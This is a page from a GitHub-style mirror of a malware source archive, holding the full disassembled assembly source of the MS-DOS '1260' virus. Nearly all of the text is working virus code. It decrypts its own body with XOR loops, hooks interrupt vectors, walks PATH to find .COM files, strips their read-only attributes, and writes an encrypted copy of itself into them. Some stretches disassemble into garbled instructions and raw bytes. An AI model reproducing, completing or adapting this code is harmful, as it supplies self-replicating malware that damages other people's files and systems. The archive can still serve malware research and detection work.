ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
e2d9bb12d0
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.v2p11260.asm
vxunderground 6bf46a48b9
Add files via upload
2021-01-12 18:04:54 -06:00

596 lines
11 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

DATA_1E EQU 4
DATA_2E EQU 6
DATA_3E EQU 0CH
DATA_4E EQU 0EH
DATA_5E EQU 2CH
DATA_6E EQU 2CH
DATA_7E EQU 0F7H
DATA_8E EQU 0FBH
DATA_11E EQU 901H
DATA_12E EQU 1002H
DATA_13E EQU 1802H
DATA_14E EQU 1F01H
DATA_15E EQU 3918H
DATA_16E EQU 57C6H
DATA_17E EQU 0F046H
DATA_18E EQU 0FFDCH
DATA_19E EQU 0FFDEH
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG
ORG 100h
1260 PROC FAR
START:
JMP DECRYPT_ROUTINE
DECRYPT_ROUTINE:
NOP
MOV DI,12AH
MOV AX,9ECDH
DEC BX
CLC
CLD
MOV CX,4DDH
LOCLOOP_3:
SUB BX,AX
XOR BX,CX
NOP
XOR [DI],AX
XOR [DI],CX
INC DI
INC AX
NOP
LOOP LOCLOOP_3 ; Loop if cx > 0
CLC ; Clear carry flag
DEC BX
INC AX
DEC BX
INC BX
DEC BX
CLC ; Clear carry flag
INC DI
INC DX
CLC ; Clear carry flag
INC DX
NOP
MOV BP,SP
SUB SP,24H
PUSH CX
MOV DX,4E0H
MOV [BP-14H],DX
PUSH DS
MOV AX,0
PUSH AX
POP DS
CLI ; Disable interrupts
MOV AX,DS:DATA_1E
MOV SS:DATA_18E[BP],AX
MOV AX,DS:DATA_2E
MOV SS:DATA_19E[BP],AX
MOV AX,DS:DATA_3E
MOV [BP-20H],AX
MOV AX,DS:DATA_4E
MOV [BP-1EH],AX
STI ; Enable interrupts
POP DS
CALL SUB_4
MOV SI,DX
ADD SI,90H
MOV DI,100H
MOV CX,3
CLD ; Clear direction
REP MOVSB ; Rep while cx>0 Mov [si] to es:[di]
MOV SI,DX
MOV AH,30H ; '0'
INT 21H ; DOS Services ah=function 30h
; get DOS version number ax
CMP AL,0
INT 3 ; Debug breakpoint
DAA ; Decimal adjust
PUSH DX
ADD BP,CX
ADD BYTE PTR [BP+SI],6
MOV AH,2FH ; '/'
INT 21H ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
INT 3 ; Debug breakpoint
OR AL,85H
POP SI
CLD ; Clear direction
INT 3 ; Debug breakpoint
SCASW ; Scan es:[di] for ax
AND AX,[BP-2]
POP ES
MOV DX,SI
ADD DX,0E1H
MOV AH,1AH
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
PUSH ES
PUSH SI
MOV ES,DS:DATA_6E
MOV DI,0
LOC_4:
POP SI
PUSH SI
ADD SI,9CH
LODSB ; String [si] to al
MOV CX,8000H
REPNE SCASB ; Rept zf=0+cx>0 Scan es:[di] for al
MOV CX,4
LOCLOOP_5:
LODSB ; String [si] to al
SCASB ; Scan es:[di] for al
JNZ LOC_4 ; Jump if not zero
LOOP LOCLOOP_5 ; Loop if cx > 0
POP SI
POP ES
MOV [BP-0CH],DI
MOV BX,SI
ADD SI,0A1H
MOV DI,SI
JMP SHORT LOC_11
DB 90H, 0CCH
LOC_6:
CMP WORD PTR [BP-0CH],0
JNE LOC_7 ; Jump if not equal
JMP LOC_22
DB 0CCH
LOC_7:
PUSH DS
PUSH SI
MOV DS,ES:DATA_5E
MOV DI,SI
MOV SI,ES:[BP-0CH]
ADD DI,0A1H
LOC_8:
LODSB ; String [si] to al
CMP AL,3BH ; ';'
JE LOC_10 ; Jump if equal
CMP AL,0
JE LOC_9 ; Jump if equal
STOSB ; Store al to es:[di]
JMP SHORT LOC_8
DB 0CCH
LOC_9:
MOV SI,0
LOC_10:
POP BX
POP DS
MOV [BP-0CH],SI
CMP CH,0FFH
JE LOC_11 ; Jump if equal
MOV AL,5CH ; '\'
STOSB ; Store al to es:[di]
LOC_11:
MOV [BP-0EH],DI
MOV SI,BX
ADD SI,96H
MOV CX,6
REP MOVSB ; Rep while cx>0 Mov [si] to es:[di]
MOV SI,BX
MOV AH,4EH ; 'N'
MOV DX,SI
ADD DX,0A1H
MOV CX,3
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JMP SHORT LOC_13
DB 90H, 0CCH
LOC_12:
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
LOC_13:
JNC LOC_14 ; Jump if carry=0
JMP SHORT LOC_6
DB 0CCH
LOC_14:
MOV AX,DS:DATA_7E[SI]
AND AL,1FH
CMP AL,1FH
JE LOC_12 ; Jump if equal
CMP WORD PTR DS:DATA_8E[SI],0F800H
JE LOC_12 ; Jump if equal
CMP WORD PTR DS:DATA_8E[SI],0AH
JE LOC_12 ; Jump if equal
MOV DI,[BP-0EH]
PUSH SI
ADD SI,0FFH
LOC_15:
LODSB ; String [si] to al
STOSB ; Store al to es:[di]
CMP AL,0
JNE LOC_15 ; Jump if not equal
POP SI
MOV AX,4300H
MOV DX,SI
ADD DX,0A1H
INT 21H ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
MOV [BP-0AH],CX
MOV AX,4301H
AND CX,0FFFEH
MOV DX,SI
ADD DX,0A1H
INT 21H ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
MOV AX,3D02H
MOV DX,SI
ADD DX,0A1H
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
JNC LOC_16 ; Jump if carry=0
JMP LOC_21
DB 0CCH
LOC_16:
MOV BX,AX
MOV AX,5700H
INT 21H ; DOS Services ah=function 57h
; get/set file date & time
MOV [BP-8],CX
MOV [BP-6],DX
MOV AH,3FH ; '?'
MOV CX,3
MOV DX,SI
ADD DX,90H
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
INT 3 ; Debug breakpoint
POP BX
SUB [BP+SI],BX
INT 3 ; Debug breakpoint
CMC ; Complement carry
DB 0C8H, 3, 0, 0CCH, 42H, 37H
DB 11H, 0CCH, 78H, 0C0H, 2, 42H
DB 0CCH, 31H, 88H, 0, 0, 0BAH
DB 0, 0, 0CDH, 21H, 73H, 3
DB 0E9H, 15H, 1, 0CCH, 8AH, 0D9H
DB 0CCH, 0DFH, 54H, 0C8H, 51H, 0CCH
DB 85H, 0A8H, 3, 0, 0CCH, 0E0H
DB 69H, 84H, 94H, 0, 81H, 0C1H
DB 0DDH, 4, 0CCH, 64H, 0EFH, 0FEH
DB 0CCH, 74H, 0F5H, 0EFH, 0AFH, 3
DB 0CCH, 92H, 1BH, 0DH, 0B4H, 2CH
DB 0CDH, 21H, 33H, 0D1H, 0CCH, 0FEH
DB 77H, 56H, 0F0H, 0CCH, 0C1H, 29H
DB 24H, 1, 0CCH, 0C8H, 43H, 46H
DB 0F0H, 0CCH, 0E7H, 0C2H, 0FFH, 0
DB 0CCH, 24H, 21H, 0C5H, 4, 0CCH
DB 0CCH, 45H, 46H, 0E8H, 0CCH, 87H
DB 0EH, 84H, 7, 0, 59H, 0CCH
DB 0, 81H, 0C1H, 27H, 1, 89H
DB 8CH
LOC_17:
ADD [BX+SI],AX
INT 3 ; Debug breakpoint
NOP
JS LOC_17 ; Jump if sign=1
ADD SS:DATA_17E[BP+DI],CL
INT 3 ; Debug breakpoint
DB 3EH ; DS:
MOV BH,46H ; 'F'
JMP FAR PTR LOC_1
DB 0CCH, 0E9H, 62H, 0FEH, 0CCH, 3
LOC_18:
SUB BH,0DDH
ADD CX,SP
RCR BYTE PTR SS:DATA_19E[BP+DI],1 ; Rotate thru carry
ADD BX,27H
MOV WORD PTR [BP-1AH],7
CALL SUB_3
MOV [BP-12H],DI
ADD BX,10H
INT 3 ; Debug breakpoint
DB 26H ; ES:
LOOPZ LOCLOOP_20 ; Loop if zf=1, cx>0
OUT 83H,AL ; port 83H, DMA page reg ch 1
ADD AH,CL
DEC SP
MOVSB ; Mov [si] to es:[di]
ADD [BX+DI],AX
ADD BX,10H
INT 3 ; Debug breakpoint
MOV BH,5FH ; '_'
CLC ; Clear carry flag
ADD [BX+DI+2],BH
MOV SI,[BP-14H]
INT 3 ; Debug breakpoint
CLI ; Disable interrupts
JNP LOC_18 ; Jump if not parity
AND AX,0F300H
MOVSB ; Mov [si] to es:[di]
MOV AX,[BP-12H]
SUB AX,DI
DEC DI
STOSB ; Store al to es:[di]
LOC_19:
MOV CX,[BP-14H]
SUB CX,3B6H
CMP CX,DI
JE LOC_27 ; Jump if equal
MOV DX,0
CALL SUB_2
JMP SHORT LOC_19
DB 0CCH, 8BH, 76H, 0ECH, 56H, 8BH
DB 0FEH, 0CCH, 0A1H, 18H, 39H, 0
DB 81H
LOCLOOP_20:
DB 0C6H, 57H, 0, 0CCH, 3CH, 0BDH
DB 0C7H, 0EH, 2, 8BH, 0D7H, 0F3H
DB 0A4H, 5EH, 5BH, 0E8H, 92H, 0
DB 5, 6, 0, 50H, 0FFH, 0E2H
DB 0CCH, 0E9H, 9BH, 23H, 3DH, 0ECH
DB 4, 0CCH, 63H, 16H, 1CH, 0B8H
DB 0, 42H, 0B9H, 0, 0, 0BAH
DB 0, 0, 0CDH, 21H, 72H, 0FH
DB 0B4H, 40H, 0B9H, 3, 0, 0CCH
DB 0D4H, 5FH, 0D6H, 81H, 0C2H, 93H
DB 0, 0CDH, 21H, 8BH, 56H, 0FAH
DB 8BH, 4EH, 0F8H, 81H, 0E1H, 0E0H
DB 0FFH, 81H, 0C9H, 1FH, 0, 0B8H
DB 1, 57H, 0CDH, 21H, 0B4H, 3EH
DB 0CDH
DB 21H
LOC_21:
MOV AX,4301H
MOV CX,[BP-0AH]
MOV DX,SI
ADD DX,0A1H
INT 21H ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
LOC_22:
PUSH DS
MOV DX,[BP-4]
MOV DS,[BP-2]
MOV AH,1AH
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
POP DS
POP CX
XOR AX,AX ; Zero register
XOR BX,BX ; Zero register
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
MOV SP,BP
MOV DI,100H
PUSH DI
CALL SUB_5
RET
1260 ENDP
SUB_1 PROC NEAR
MOV CX,[BP-10H]
XOR CX,813CH
ADD CX,9248H
ROR CX,1 ; Rotate
ROR CX,1 ; Rotate
ROR CX,1 ; Rotate
MOV [BP-10H],CX
AND CX,7
PUSH CX
INC CX
XOR AX,AX ; Zero register
STC ; Set carry flag
RCL AX,CL ; Rotate thru carry
POP CX
RET
SUB_1 ENDP
DB 58H, 50H, 0C3H
SUB_2 PROC NEAR
LOC_23:
CALL SUB_1
TEST DX,AX
JNZ LOC_23 ; Jump if not zero
OR DX,AX
MOV AX,CX
SHL AX,1 ; Shift w/zeros fill
PUSH AX
XLAT ; al=[al+[bx]] table
MOV CX,AX
POP AX
INC AX
XLAT ; al=[al+[bx]] table
ADD AX,[BP-14H]
MOV SI,AX
REP MOVSB ; Rep while cx>0 Mov [si] to es:[di]
RET
SUB_2 ENDP
SUB_3 PROC NEAR
MOV DX,0
LOC_24:
CALL SUB_2
MOV AX,DX
AND AX,[BP-1AH]
CMP AX,[BP-1AH]
JNE LOC_24 ; Jump if not equal
RET
SUB_3 ENDP
DB 53H, 8BH, 0DCH, 50H, 56H, 8BH
DB 77H, 2, 0FFH, 47H, 2, 89H
DB 76H, 0E4H, 0ACH, 30H, 4, 8AH
DB 47H, 7, 0CH, 1, 88H, 47H
DB 7, 5EH, 58H, 5BH, 0CFH, 53H
DB 8BH, 0DCH, 50H, 56H, 8BH, 76H
DB 0E4H, 0ACH, 30H, 4, 8AH, 47H
DB 7, 24H, 0FEH, 88H, 47H, 7
DB 5EH, 58H, 5BH, 0CFH
SUB_4 PROC NEAR
PUSHF ; Push flags
PUSH DS
PUSH AX
MOV AX,0
PUSH AX
POP DS
MOV AX,[BP-14H]
SUB AX,82H
CLI ; Disable interrupts
MOV DS:DATA_3E,AX
MOV AX,[BP-14H]
SUB AX,65H
MOV DS:DATA_1E,AX
PUSH CS
POP AX
MOV DS:DATA_2E,AX
MOV DS:DATA_4E,AX
STI ; Enable interrupts
POP AX
POP DS
POPF ; Pop flags
RET
SUB_4 ENDP
SUB_5 PROC NEAR
PUSHF ; Push flags
PUSH DS
PUSH AX
MOV AX,0
PUSH AX
POP DS
MOV AX,[BP-20H]
CLI ; Disable interrupts
MOV DS:DATA_3E,AX
MOV AX,SS:DATA_18E[BP]
MOV DS:DATA_1E,AX
MOV AX,SS:DATA_19E[BP]
MOV DS:DATA_2E,AX
MOV AX,[BP-1EH]
MOV DS:DATA_4E,AX
STI ; Enable interrupts
POP AX
POP DS
POPF ; Pop flags
RET
SUB_5 ENDP
DB 0BFH, 2AH, 1, 0B8H, 0CDH, 9EH
DB 0B9H, 0DDH, 4, 0F8H, 0FCH, 46H
DB 4BH, 90H
LOCLOOP_25:
XOR [DI],AX
XOR [DI],CX
XOR DX,CX
XOR BX,CX
SUB BX,AX
SUB BX,CX
SUB BX,DX
NOP
INC AX
INC DI
INC BX
INC SI
INC DX
CLC ; Clear carry flag
DEC BX
NOP
LOOP LOCLOOP_25 ; Loop if cx > 0
ADD AX,[BX+SI]
ADD AX,[BP+DI]
ADD AX,DS:DATA_11E
ADD [BP+SI],CX
ADD [BP+DI],CX
ADD [SI],CX
ADD [DI],CX
ADD CL,DS:DATA_12E
ADD DL,[BP+SI]
ADD DL,[SI]
ADD DL,DS:DATA_13E
ADD BL,[BP+SI]
ADD [SI],BX
ADD [DI],BX
ADD DS:DATA_14E,BX
ADD [BX+SI],SP
ADD [BX+DI],SP
ADD [BP+SI],SP
ADD [BP+DI],SP
ADD [SI],SP
MOV CX,[BP-18H]
MOV AX,[BP-16H]
MOV DI,SI
SUB DI,3B6H
CALL SUB_6
MOV AH,40H ; '@'
MOV CX,4ECH
MOV DX,SI
SUB DX,3DDH
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
PUSHF ; Push flags
PUSH AX
MOV CX,[BP-18H]
MOV AX,[BP-16H]
MOV DI,SI
SUB DI,3B6H
CALL SUB_6
POP AX
POPF ; Pop flags
RET
SUB_6 PROC NEAR
LOCLOOP_26:
XOR [DI],AX
XOR [DI],CX
INC AX
INC DI
LOOP LOCLOOP_26 ; Loop if cx > 0
RET
SUB_6 ENDP
DB 90H, 0CDH, 20H, 0E9H, 0, 0
DB 2AH, 2EH, 43H, 4FH, 4DH, 0
DB 'PATH=1260.COM'
DB 0, 0, 4DH
DB 53 DUP (0)
DB 3, 3FH
DB 7 DUP (3FH)
DB 43H, 4FH, 4DH, 3, 3, 0
DB 6FH, 0, 0, 0, 0, 0
DB 20H, 80H, 3, 21H, 0, 3
DB 0, 0, 0
DB '1260.COM'
DB 0, 0, 4DH, 0, 0, 0
DB 0, 0
CODE_SEG ENDS
END START

Reference in New Issue View Git Blame Copy Permalink